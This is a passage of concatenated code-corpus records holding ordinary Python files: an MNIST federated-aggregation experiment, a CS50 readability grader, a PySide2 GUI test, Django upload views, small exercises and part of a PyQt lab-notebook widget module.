tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\n \n np.random.seed(seed)\n \n # the data, split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n if K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n\n global_dataset_size = 0\n local_dataset_size = 60000\n\n X_global = x_train[-global_dataset_size:]\n Y_global = y_train[-global_dataset_size:]\n X_local = x_train[:-global_dataset_size]\n Y_local = y_train[:-global_dataset_size]\n\n X_local_list, Y_local_list = utils.split_training_set(3000, 20, X_local, Y_local)\n\n # convert class vectors to binary class matrices\n num_classes = 10\n Y_global = keras.utils.to_categorical(Y_global, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n model1 = custom_model(input_shape, num_classes)\n compile_model(model1)\n fit_model_with_datasets(model1, 1, X_global, Y_global)\n\n model_list = list()\n for _ in range(20):\n model_list.append(tf.keras.models.clone_model(model1)) \n model_list[_].set_weights(model1.get_weights())\n\n # sort models according to similarity. 
We arbitrarily take the model1 as a \"standard\"\n standard_model = tf.keras.models.clone_model(model1)\n standard_model.set_weights(model_list[0].get_weights())\n\n for i in range(len(model_list)):\n compile_model(model_list[i])\n fit_model_with_datasets(model_list[i], (i+1)*10, X_local_list[i], Y_local_list[i])\n\n model_list.sort(key=lambda m : semantic_drift.l2_distance(standard_model, m))\n\n theta_list = [0, 0.5, 1]\n agg_weights_list_per_pi = list()\n dist_list = list()\n\n for model_comp in model_combs(model_list):\n if model_comp[0] is model_comp[1]: #disregard same models\n continue\n weights = [model_comp[0].get_weights(), model_comp[1].get_weights()]\n agg_weights_list = list()\n for theta in theta_list:\n agg_weights = list()\n for weights_list_tuple in zip(*weights):\n agg_weights.append(np.array([np.average(np.array(w), axis=0, weights=[1. - theta, theta]) for w in zip(*weights_list_tuple)]))\n agg_weights_list.append(agg_weights)\n dist_list.append(semantic_drift.l2_distance(model_comp[0], model_comp[1]))\n agg_weights_list_per_pi.append(agg_weights_list)\n\n agg_weights_list_per_pi_sorted = [x for _,x in sorted(zip(dist_list,agg_weights_list_per_pi))]\n model_combs_sorted = [x for _,x in sorted(zip(dist_list, model_combs(model_list)))]\n\n B = np.zeros(len(agg_weights_list_per_pi))\n\n i = 0\n for agg_weights_list in agg_weights_list_per_pi_sorted:\n\n aggr_model = keras.models.clone_model(model1)\n aggr_model.set_weights(agg_weights_list[1])\n compile_model(aggr_model)\n score = aggr_model.evaluate(x=x_test, y=y_test, verbose=0)\n \n aggr_model = keras.models.clone_model(model1)\n aggr_model.set_weights(agg_weights_list[0])\n compile_model(aggr_model)\n comp_score1 = aggr_model.evaluate(x=x_test, y=y_test, verbose=0)\n \n aggr_model = keras.models.clone_model(model1)\n aggr_model.set_weights(agg_weights_list[2])\n compile_model(aggr_model)\n comp_score2 = aggr_model.evaluate(x=x_test, y=y_test, verbose=0)\n \n B[i] = score[0] - min(comp_score1[0], comp_score2[0])\n K.clear_session() #prevent memory leak https://github.com/keras-team/keras/issues/13118\n i += 1\n if i % 10 == 0:\n print(\"{}th iteration\".format(i))\n\n return B, dist_list","sub_path":"aggregation_experiment_transferred.py","file_name":"aggregation_experiment_transferred.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"342341362","text":"from cs50 import get_string\nfrom sys import exit\n\nletterCount = wordCount = sentenceCount = 0\n\ninputString = get_string(\"Enter: \")\n# Characters signifying end of sentence\nendChars = \"?!.\"\n\n# Loop across the string\nfor c in inputString:\n # Check letter\n if c.isalpha():\n letterCount += 1\n # Check space\n if c == \" \":\n # For first space encountered increment wordCount\n if (not wordCount):\n wordCount += 1\n wordCount += 1\n # Check if character is a sentenace endpoint\n if c in endChars:\n sentenceCount += 1\n\n# Coleman-Liau formula\nL = 100 * letterCount / wordCount\nS = 100 * sentenceCount / wordCount\nindex = round(0.0588 * L - 0.296 * S - 15.8)\n\nif (index < 1):\n print(\"Before Grade 1\\n\")\nelif (index > 16):\n print(\"Grade 16+\\n\")\nelse:\n print(f\"Grade {index}\\n\") \n","sub_path":"week6/readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"491009150","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@date Created 
on Wed Jan 20 14:10:24 2016\n@copyright (C) 2015-2016 EOMYS ENGINEERING.\n@author pierre_b\n\"\"\"\n\nimport sys\nfrom random import uniform\n\nfrom PySide2 import QtWidgets\nfrom PySide2.QtTest import QTest\nfrom pyleecan.Classes.Material import Material\nfrom pyleecan.Classes.LamHole import LamHole\nfrom pyleecan.Classes.HoleM57 import HoleM57\nfrom pyleecan.GUI.Dialog.DMatLib.DMatLib import LIB_KEY, MACH_KEY\nfrom pyleecan.GUI.Dialog.DMachineSetup.SMHoleMag.PHoleM57.PHoleM57 import PHoleM57\nfrom Tests.GUI import gui_option # Set unit to m\n\nimport pytest\n\n\nclass TestPHoleM57(object):\n \"\"\"Test that the widget PHoleM57 behave like it should\"\"\"\n\n @pytest.fixture\n def setup(self):\n \"\"\"Run at the begining of every test to setup the gui\"\"\"\n\n if not QtWidgets.QApplication.instance():\n self.app = QtWidgets.QApplication(sys.argv)\n else:\n self.app = QtWidgets.QApplication.instance()\n\n test_obj = LamHole(Rint=0.1, Rext=0.2)\n test_obj.hole = list()\n test_obj.hole.append(\n HoleM57(H1=0.11, H2=0.12, W0=0.13, W1=0.14, W2=0.15, W3=0.17, W4=0.19)\n )\n test_obj.hole.append(\n HoleM57(\n H1=0.11,\n H2=0.12,\n W0=0.13,\n W1=0.14,\n W2=0.15,\n W3=0.17,\n W4=0.19,\n magnet_0=None,\n )\n )\n\n material_dict = {LIB_KEY: list(), MACH_KEY: list()}\n material_dict[LIB_KEY] = [\n Material(name=\"Magnet1\"),\n Material(name=\"Magnet2\"),\n Material(name=\"Magnet3\"),\n ]\n\n widget = PHoleM57(test_obj.hole[0], material_dict)\n widget2 = PHoleM57(test_obj.hole[1], material_dict)\n\n yield {\n \"widget\": widget,\n \"widget2\": widget2,\n \"test_obj\": test_obj,\n \"material_dict\": material_dict,\n }\n\n self.app.quit()\n\n def test_init(self, setup):\n \"\"\"Check that the Widget spinbox initialise to the lamination value\"\"\"\n\n assert setup[\"widget\"].lf_H1.value() == 0.11\n assert setup[\"widget\"].lf_H2.value() == 0.12\n assert setup[\"widget\"].lf_W0.value() == 0.13\n assert setup[\"widget\"].lf_W1.value() == 0.14\n assert setup[\"widget\"].lf_W2.value() == 0.15\n assert setup[\"widget\"].lf_W3.value() == 0.17\n assert setup[\"widget\"].lf_W4.value() == 0.19\n\n assert setup[\"widget\"].w_mat_1.isHidden() == False\n\n setup[\"test_obj\"].hole[0] = HoleM57(\n H1=0.21, H2=0.22, W0=0.23, W1=0.24, W2=0.25, W3=0.27, W4=0.29\n )\n setup[\"widget\"] = PHoleM57(setup[\"test_obj\"].hole[0], setup[\"material_dict\"])\n assert setup[\"widget\"].lf_H1.value() == 0.21\n assert setup[\"widget\"].lf_H2.value() == 0.22\n assert setup[\"widget\"].lf_W0.value() == 0.23\n assert setup[\"widget\"].lf_W1.value() == 0.24\n assert setup[\"widget\"].lf_W2.value() == 0.25\n assert setup[\"widget\"].lf_W3.value() == 0.27\n assert setup[\"widget\"].lf_W4.value() == 0.29\n\n assert setup[\"widget2\"].w_mat_1.isHidden() == True\n\n def test_set_W0(self, setup):\n \"\"\"Check that the Widget allow to update W0\"\"\"\n # Clear the field before writing the new value\n setup[\"widget\"].lf_W0.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W0, \"0.31\")\n setup[\"widget\"].lf_W0.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.W0 == 0.31\n assert setup[\"test_obj\"].hole[0].W0 == 0.31\n\n def test_set_W1(self, setup):\n \"\"\"Check that the Widget allow to update W1\"\"\"\n setup[\"widget\"].lf_W1.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W1, \"0.32\")\n setup[\"widget\"].lf_W1.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.W1 == 0.32\n assert setup[\"test_obj\"].hole[0].W1 == 0.32\n\n def test_set_W2(self, setup):\n \"\"\"Check that the 
Widget allow to update W2\"\"\"\n setup[\"widget\"].lf_W2.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W2, \"0.33\")\n setup[\"widget\"].lf_W2.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.W2 == 0.33\n assert setup[\"test_obj\"].hole[0].W2 == 0.33\n\n def test_set_W3(self, setup):\n \"\"\"Check that the Widget allow to update W3\"\"\"\n setup[\"widget\"].lf_W3.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W3, \"0.323\")\n setup[\"widget\"].lf_W3.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.W3 == 0.323\n assert setup[\"test_obj\"].hole[0].W3 == 0.323\n\n def test_set_W4(self, setup):\n \"\"\"Check that the Widget allow to update W4\"\"\"\n setup[\"widget\"].lf_W4.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W4, \"0.334\")\n setup[\"widget\"].lf_W4.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.W4 == 0.334\n assert setup[\"test_obj\"].hole[0].W4 == 0.334\n\n def test_set_H1(self, setup):\n \"\"\"Check that the Widget allow to update H1\"\"\"\n setup[\"widget\"].lf_H1.clear()\n QTest.keyClicks(setup[\"widget\"].lf_H1, \"0.35\")\n setup[\"widget\"].lf_H1.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.H1 == 0.35\n assert setup[\"test_obj\"].hole[0].H1 == 0.35\n\n def test_set_H2(self, setup):\n \"\"\"Check that the Widget allow to update H2\"\"\"\n setup[\"widget\"].lf_H2.clear()\n QTest.keyClicks(setup[\"widget\"].lf_H2, \"0.36\")\n setup[\"widget\"].lf_H2.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.H2 == 0.36\n assert setup[\"test_obj\"].hole[0].H2 == 0.36\n","sub_path":"Tests/GUI/DMachineSetup/PHole/test_PHoleM57.py","file_name":"test_PHoleM57.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314547372","text":"#def sub():\n# tally = 0\n# while True:\n# next = yield\n# if next is None:\n# return tally\n# tally += next\n\n#def master(tallies):\n# tally = yield from sub()\n# tallies.append(tally)\n# print(tallies)\n\n#tallies = []\n\n#acc = master(tallies)\n\n#try:\n# acc.send(None)\n# for i in range(4):\n# acc.send(i)\n\n\n# acc.send(None)\n#except StopIteration:\n# pass\n\n# ======================================\ndef m():\n for i in range(3):\n if not int(i) == 2:\n yield i\n else:\n return 33\n\ndef f():\n while 1:\n result = yield from m()\n print(result)\ng = f()\nprint(type(g))\n\n","sub_path":"backend/python/yield/yield_from.py","file_name":"yield_from.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"182602450","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom aksharaklp import settings\nfrom aksharaklp.fileuploadapp.models import Document\nfrom aksharaklp.fileuploadapp.forms import DocumentForm\nfrom aksharaklp.fileuploadapp.filereader import read_file\nfrom aksharaklp.fileuploadapp.dataanalyzer import analyze_data\nfrom django.contrib.auth.decorators import login_required\n\ndef list(request):\n # Handle file upload\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n \n if form.is_valid():\n newdoc = Document(docfile = request.FILES['docfile'])\n newdoc.save()\n read_file(settings.PROJECT_ROOT+newdoc.docfile.url)\n\n # 
Redirect to the document list after POST\n return HttpResponseRedirect(reverse('aksharaklp.fileuploadapp.views.list'))\n else:\n form = DocumentForm() # An empty, unbound form\n\n # Load documents for the list page\n documents = Document.objects.all()\n\n # Render list page with the documents and the form\n return render_to_response(\n 'fileuploadapp/list.html',\n {'documents': documents, 'form': form},\n context_instance=RequestContext(request)\n )\n\ndef analyze(request):\n print(\"Start analysis ===>\");\n #handle data analysis call\n if request.method == 'GET':\n analysis = analyze_data()\n \n # Redirect to the document list \n form = DocumentForm() # An empty, unbound form\n\n # Load documents for the list page\n documents = Document.objects.all()\n\n return render_to_response(\n 'fileuploadapp/list.html',\n {'documents': documents, 'form': form, 'analysis': analysis},\n context_instance=RequestContext(request)\n )","sub_path":"aksharaklp/aksharaklp/fileuploadapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430675875","text":"\"\"\"\nWe want to carry out a survey of student absences in the first programming exam for each of\nthe 14 existing classes. For each class a set of values is provided: the first two values of the set\ncorrespond to the class identifier (A, B, C ...) and the number of enrolled students, and the\nremaining values of the set contain the student's registration number and the letter A or P\ndepending on whether the student was absent or present, respectively. Write an algorithm that:\na) for each class, computes the absence percentage and prints the class identifier and the\ncomputed percentage.\nb) determines and prints how many classes had an absence percentage above 5%.\n\"\"\"\n#import readchar\n\ndef main():\n TURMA = '' # class identifier\n ALUNOS = 0 # number of students enrolled in the class\n MATRICULA = \"\" # student registration number\n CHAMADA = '' # A or P (absent or present)\n QUANT_A = 0 # number of absent students per class\n QUANT_P = 0 # number of present students per class\n PORCENT = 0.0 # absence percentage per class\n N_TUR = 0 # counter for the number of classes\n N_ALU = 0 # counter for the number of students per class\n T = 0 # counter for classes with absence > 5%\n # initialization of the general accumulators\n N_TUR = 0 # counter up to 14 classes\n # total number of classes with absence above 5%\n PORCENT = 0.0\n while (N_TUR!=3) :\n QUANT_A = 0\n QUANT_P = 0\n N_ALU = 0 # counter up to the number of students in the class\n print(\"enter the class : \")\n #TURMA = readchar.readchar()\n #print(TURMA)\n TURMA = input()\n print(\"enter the number of enrolled students: \")\n ALUNOS = int(input())\n print(ALUNOS)\n while (N_ALU != ALUNOS):\n print(\"enter the registration number: \")\n MATRICULA = int(input())\n print(MATRICULA)\n print(\"Roll call (P/A): \")\n #CHAMADA = readchar.readchar()\n #print(CHAMADA)\n CHAMADA = input()\n if(CHAMADA == 'P'):\n QUANT_P = QUANT_P + 1\n else:\n if(CHAMADA == 'A'):\n QUANT_A = QUANT_A + 1\n N_ALU = N_ALU + 1\n PORCENT = 100 * (float(QUANT_A) / float(N_ALU))\n print(\"Class: \", TURMA,\"Absences: \",PORCENT)\n if(PORCENT > 5):\n T = T + 1\n N_TUR = N_TUR + 1 # next class\n print(\"Number of classes with absence above 5%: \", T)\n\nif __name__ == '__main__':\n 
main()","sub_path":"python/lst6.py","file_name":"lst6.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478516306","text":"import urllib\n\ndef read_text():\n\tquotes = open(\"quotes.txt\")\n\tcontents = quotes.read()\n\tquotes.close()\n\tcheck_profanity(contents)\n\t\ndef check_profanity(text_to_check):\n\tconnection = urllib.urlopen(\"http://www.wdyl.com/profanity?q=\"+text_to_check)\n\toutput = connection.read()\n\tprint(output)\n\tconnection.close()\n\nread_text()\n","sub_path":"check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377232119","text":"\"\"\" This module contains the custom widget used in labnote \"\"\"\n\n# Python import\nimport sqlite3\nimport sip\n\n# PyQt import\nfrom PyQt5.QtWidgets import QWidget, QLabel, QVBoxLayout, QFrame, QHBoxLayout, QPushButton, QAction, QMenu, \\\n QMessageBox, QAbstractItemView, QPlainTextEdit, QCompleter\nfrom PyQt5.QtGui import QPixmap, QFont, QStandardItem, QColor, QTextCharFormat, QBrush, QPainter, QPen, QIcon, \\\n QTextListFormat, QPainterPath, QTextDocument, QRegExpValidator, QTextCursor\nfrom PyQt5.QtCore import Qt, pyqtSignal, QModelIndex, QRectF, QEvent, QRegExp, QItemSelectionModel\n\n# Project import\nfrom labnote.core import stylesheet\nfrom labnote.interface.widget.view import DragDropTreeView\nfrom labnote.interface.widget.model import StandardItemModel\nfrom labnote.interface.dialog.category import Category, Subcategory\nfrom labnote.interface.widget.textedit import CompleterTextEdit, ImageTextEdit\nfrom labnote.interface.widget.lineedit import LineEdit\nfrom labnote.utils import database\nfrom labnote.core import sqlite_error, common\nfrom labnote.ui.widget.ui_texteditor import Ui_TextEditor\n\n# Constant definition\n\n# Reference type\nTYPE_ARTICLE = common.TYPE_ARTICLE\nTYPE_BOOK = common.TYPE_BOOK\nTYPE_CHAPTER = common.TYPE_CHAPTER\n\n# Category frame content type\nTYPE_LIBRARY = common.TYPE_LIBRARY\nTYPE_PROTOCOL = common.TYPE_PROTOCOL\n\n# Data type\nQT_LevelRole = common.QT_LevelRole\nQT_StateRole = common.QT_StateRole\n\n# Level type\nLEVEL_CATEGORY = common.LEVEL_CATEGORY\nLEVEL_SUBCATEGORY = common.LEVEL_SUBCATEGORY\nLEVEL_ENTRY = common.LEVEL_ENTRY\n\n\nclass NoEntryWidget(QWidget):\n \"\"\"Widget that indicate that no entry is selected \"\"\"\n\n def __init__(self):\n super(NoEntryWidget, self).__init__()\n # Set stylesheet\n stylesheet.set_style_sheet(self, \":/StyleSheet/Widget/style-sheet/widget/widget/no_entry_widget.qss\")\n\n # Setting up the widget\n no_entry_pixmap = QPixmap(\":/Icons/MainWindow/icons/main-window/no_entry_selected.png\")\n lbl_no_entry_image = QLabel()\n lbl_no_entry_image.setAlignment(Qt.AlignCenter)\n\n lbl_no_entry_image.setPixmap(no_entry_pixmap.scaled(16, 16, Qt.KeepAspectRatio))\n\n lbl_no_entry = QLabel(\"No entry selected\")\n lbl_no_entry.setAlignment(Qt.AlignCenter)\n\n # Setting up the layout\n main_layout = QVBoxLayout(self)\n main_layout.addWidget(lbl_no_entry_image)\n main_layout.addWidget(lbl_no_entry)\n\n\nclass CategoryFrame(QWidget):\n \"\"\" Class that show and manage the data in the category TreeView \"\"\"\n\n # Signal definition\n delete = pyqtSignal(str) # Delete the entry\n entry_selected = pyqtSignal(str) # A reference is selected in the treeview\n selection_changed = pyqtSignal(QModelIndex) # Everything is selected in the 
treeview\n list_displayed = pyqtSignal() # The list showed in the treeview\n\n def __init__(self, title, frame_type):\n super(CategoryFrame, self).__init__()\n self.setFixedWidth(240)\n self.frame = QFrame()\n\n # Set style sheet\n self.frame.setStyleSheet(\"\"\"\n .QFrame {\n border-left: none;\n border-top: none;\n border-bottom: none;\n border-right: 0.5px solid rgb(212, 212, 212);\n background-color: rgb(246, 246, 246);\n }\n \"\"\")\n\n # Set class variable\n self.frame_type = frame_type\n\n # Create the interface\n self.layout = QVBoxLayout()\n self.layout.setContentsMargins(0, 0, 0, 0)\n\n # Create the title label\n self.lbl_title = QLabel(title)\n self.lbl_title.setStyleSheet(\"\"\"\n QLabel {\n color: rgb(129, 129, 129);\n font: bold 12px;\n }\n \"\"\")\n self.layout.addWidget(self.lbl_title)\n self.layout.setSpacing(0)\n\n # Create the treeview\n self.view_tree = DragDropTreeView()\n self.view_tree.setStyleSheet(\"\"\"\n QTreeView {\n border: none;\n background-color: rgb(246, 246, 246);\n }\n \n QTreeView::item:selected {\n background-color: rgb(216, 216, 216);\n color: black;\n }\n\n QTreeView::branch:selected {\n background-color: rgb(216, 216, 216);\n }\n \n QTreeView::branch::closed::has-children {\n image: url(:/Icons/Library/icons/library/branch-close.png);\n }\n\n QTreeView::branch::open::has-children {\n image: url(:/Icons/Library/icons/library/branch-open.png);\n }\n \"\"\")\n self.layout.addWidget(self.view_tree)\n\n # Create the buttons\n self.layout_button = QHBoxLayout()\n self.layout_button.setSpacing(0)\n self.btn_add = QPushButton(\"+\")\n self.btn_add.setStyleSheet(\"\"\"\n QPushButton {\n /* Border and background color */\n background-color: none;\n border: none;\n\n /* Text color and font */\n font-family: Al Bayan;\n font: 24pt;\n color: rgb(129, 129, 129);\n\n /* Button height and width */\n width: 25px;\n min-width: 25px;\n max-height: 25px;\n\n height: 25px;\n min-height: 25px;\n max-height: 25px;\n }\n\n QPushButton:pressed {\n /* Border and background color */\n background-color: none;\n border: none;\n color: rgb(72, 72, 72);\n }\n \"\"\")\n self.btn_add.setEnabled(False)\n self.layout_button.addWidget(self.btn_add)\n self.btn_manage = QPushButton()\n self.btn_manage.setStyleSheet(\"\"\"\n QPushButton {\n border-image: url(:/Icons/MainWindow/icons/main-window/settings.png);\n max-width: 24px;\n min-width: 24px;\n max-height: 16px;\n min-height: 16px;\n }\n\n QPushButton:pressed {\n border-image: url(:/Icons/MainWindow/icons/main-window/settings_pressed.png);\n }\n\n\n QPushButton:pressed {\n /* Border and background color */\n background-color: none;\n border: none;\n }\n\n QPushButton::menu-indicator {\n height: 0px;\n width: 0px;\n }\n \"\"\")\n self.layout_button.addWidget(self.btn_manage)\n self.layout_button.addStretch()\n self.layout.addLayout(self.layout_button)\n\n self.frame.setLayout(self.layout)\n\n # Create the manage button menu\n self.manage_menu = QMenu(self)\n self.manage_menu.setFont(QFont(self.font().family(), 13, QFont.Normal))\n self.act_create_category = QAction(\"Create category\", self)\n self.act_create_category.triggered.connect(self.create_category)\n self.manage_menu.addAction(self.act_create_category)\n self.act_update_category = QAction(\"Update category\", self)\n self.act_update_category.triggered.connect(self.update_category)\n self.act_update_category.setEnabled(False)\n self.manage_menu.addAction(self.act_update_category)\n self.act_delete_category = QAction(\"Delete category\", self)\n 
self.act_delete_category.triggered.connect(self.delete_category)\n self.act_delete_category.setEnabled(False)\n self.manage_menu.addAction(self.act_delete_category)\n self.manage_menu.addSeparator()\n self.act_create_subcategory = QAction(\"Create subcategory\", self)\n self.act_create_subcategory.triggered.connect(self.create_subcategory)\n self.manage_menu.addAction(self.act_create_subcategory)\n self.act_update_subcategory = QAction(\"Update subcategory\", self)\n self.act_update_subcategory.triggered.connect(self.update_subcategory)\n self.act_update_subcategory.setEnabled(False)\n self.manage_menu.addAction(self.act_update_subcategory)\n self.act_delete_subcategory = QAction(\"Delete subcategory\", self)\n self.act_delete_subcategory.triggered.connect(self.delete_subcategory)\n self.act_delete_subcategory.setEnabled(False)\n self.manage_menu.addAction(self.act_delete_subcategory)\n self.manage_menu.addSeparator()\n\n if self.frame_type == TYPE_LIBRARY:\n delete_text = \"Delete reference\"\n elif self.frame_type == TYPE_PROTOCOL:\n delete_text = \"Delete protocol\"\n self.act_delete = QAction(delete_text, self)\n self.act_delete.triggered.connect(self.delete_entry)\n self.act_delete.setEnabled(False)\n self.manage_menu.addAction(self.act_delete)\n self.btn_manage.setMenu(self.manage_menu)\n\n # Edit and selections properties\n self.view_tree.header().hide()\n self.view_tree.setSelectionMode(QAbstractItemView.SingleSelection)\n self.view_tree.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.view_tree.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.view_tree.setDragDropMode(QAbstractItemView.InternalMove)\n\n # Setup the main layout\n self.main_layout = QHBoxLayout()\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n self.main_layout.addWidget(self.frame)\n self.setLayout(self.main_layout)\n\n def update_category(self):\n \"\"\" Show a dialog to update a category \"\"\"\n\n # Get the category informations\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_category(index):\n name = index.data(Qt.DisplayRole)\n selected_id = index.data(Qt.UserRole)\n\n # Show the dialog\n category = Category(name, selected_id)\n category.lbl_title.setText(\"Update a category\")\n category.setWindowModality(Qt.WindowModal)\n category.setParent(self, Qt.Sheet)\n category.show()\n category.accepted.connect(self.show_list)\n\n def create_category(self):\n \"\"\" Show a sheet dialog to create a new category \"\"\"\n category = Category()\n category.lbl_title.setText(\"Create a new category\")\n category.setWindowModality(Qt.WindowModal)\n category.setParent(self, Qt.Sheet)\n category.show()\n category.accepted.connect(self.show_list)\n\n def delete_category(self):\n \"\"\" Delete an existing category \"\"\"\n\n # Get the category informations\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_category(index):\n selected_id = index.data(Qt.UserRole)\n\n try:\n database.delete_category(selected_id)\n except sqlite3.Error as exception:\n error_code = sqlite_error.sqlite_err_handler(str(exception))\n\n if error_code == sqlite_error.FOREIGN_KEY_CODE:\n message = QMessageBox()\n message.setWindowTitle(\"LabNote\")\n message.setText(\"Unable to delete category\")\n message.setInformativeText(\"Only empty category can be deleted.\")\n message.setIcon(QMessageBox.Information)\n message.setStandardButtons(QMessageBox.Ok)\n message.exec()\n return\n else:\n message = QMessageBox(QMessageBox.Warning, \"Error deleting the category\",\n \"An error occurred while 
deleting the category.\", QMessageBox.Ok)\n message.setWindowTitle(\"LabNote\")\n message.setDetailedText(str(exception))\n message.exec()\n return\n self.show_list()\n\n def create_subcategory(self):\n \"\"\" Show a sheet dialog to create a new subcategory \"\"\"\n category = Subcategory()\n category.lbl_title.setText(\"Create a new subcategory\")\n category.setWindowModality(Qt.WindowModal)\n category.setParent(self, Qt.Sheet)\n category.show()\n category.accepted.connect(self.show_list)\n\n def update_subcategory(self):\n \"\"\" Show a dialog to update a category \"\"\"\n\n # Get the subcategory informations\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_subcategory(index):\n name = index.data(Qt.DisplayRole)\n selected_id = index.data(Qt.UserRole)\n\n # Show the dialog\n subcategory = Subcategory(name, selected_id)\n subcategory.lbl_title.setText(\"Update a subcategory\")\n subcategory.setWindowModality(Qt.WindowModal)\n subcategory.setParent(self, Qt.Sheet)\n subcategory.show()\n subcategory.accepted.connect(self.show_list)\n\n def delete_subcategory(self):\n \"\"\" Delete a subcategory \"\"\"\n # Get the subcategory informations\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_subcategory(index):\n selected_id = index.data(Qt.UserRole)\n\n try:\n database.delete_subcategory(selected_id)\n except sqlite3.Error as exception:\n error_code = sqlite_error.sqlite_err_handler(str(exception))\n\n if error_code == sqlite_error.FOREIGN_KEY_CODE:\n message = QMessageBox()\n message.setWindowTitle(\"LabNote\")\n message.setText(\"Unable to delete subcategory\")\n message.setInformativeText(\"Only empty subcategory can be deleted.\")\n message.setIcon(QMessageBox.Information)\n message.setStandardButtons(QMessageBox.Ok)\n message.exec()\n return\n else:\n message = QMessageBox(QMessageBox.Warning, \"Error deleting the subcategory\",\n \"An error occurred while deleting the subcategory.\", QMessageBox.Ok)\n message.setWindowTitle(\"LabNote\")\n message.setDetailedText(str(exception))\n message.exec()\n return\n self.show_list()\n\n def delete_entry(self):\n \"\"\" Delete the current entry \"\"\"\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_entry(index):\n ref_uuid = index.data(Qt.UserRole)\n self.delete.emit(ref_uuid)\n\n def show_list(self):\n \"\"\" Show the category, subcategory and entry list \"\"\"\n\n entry_list = None\n\n try:\n if self.frame_type == TYPE_LIBRARY:\n entry_list = database.select_reference_category()\n elif self.frame_type == TYPE_PROTOCOL:\n entry_list = database.select_protocol_category()\n\n except sqlite3.Error as exception:\n message = QMessageBox(QMessageBox.Warning, \"Error while loading data\",\n \"An error occurred while loading the references data.\", QMessageBox.Ok)\n message.setWindowTitle(\"LabNote\")\n message.setDetailedText(str(exception))\n message.exec()\n return\n\n model = StandardItemModel()\n root = model.invisibleRootItem()\n\n if entry_list:\n for category in entry_list:\n category_item = QStandardItem(category.name)\n category_item.setData(category.id, Qt.UserRole)\n category_item.setData(self.prepare_category_data_string(category.id), QT_StateRole)\n category_item.setData(LEVEL_CATEGORY, QT_LevelRole)\n category_item.setFont(QFont(self.font().family(), 12, QFont.Bold))\n category_item.setDragEnabled(False)\n root.appendRow(category_item)\n\n if category.subcategory:\n for subcategory in category.subcategory:\n subcategory_item = QStandardItem(subcategory.name)\n 
subcategory_item.setData(subcategory.id, Qt.UserRole)\n subcategory_item.setData(self.prepare_subcategory_data_string(subcategory.id), QT_StateRole)\n subcategory_item.setData(LEVEL_SUBCATEGORY, QT_LevelRole)\n subcategory_item.setDragEnabled(False)\n category_item.appendRow(subcategory_item)\n\n if subcategory.entry:\n for entry in subcategory.entry:\n author = None\n label = \"\"\n if entry.author:\n author_list = entry.author.split(',')\n label = \"{}\".format(author_list[0].split()[len(author_list[0].split()) - 1])\n if entry.year:\n if label != \"\":\n label = \"{} ({})\".format(label, entry.year)\n else:\n label = \"({})\".format(entry.year)\n if entry.title:\n if label != \"\":\n label = \"{}, {}\".format(label, entry.title)\n else:\n label = \"{}\".format(entry.title)\n reference_item = QStandardItem(label)\n reference_item.setData(entry.uuid, Qt.UserRole)\n reference_item.setData(LEVEL_ENTRY, QT_LevelRole)\n reference_item.setForeground(QColor(96, 96, 96))\n subcategory_item.appendRow(reference_item)\n if category.entry:\n for reference in category.entry:\n author = None\n label = \"\"\n if reference.author:\n author = reference.author.split()[0]\n label = \"{}\".format(author)\n if reference.year:\n if label != \"\":\n label = \"{} ({})\".format(label, reference.year)\n else:\n label = \"({})\".format(reference.year)\n if reference.title:\n if label != \"\":\n label = \"{}, {}\".format(label, reference.title)\n else:\n label = 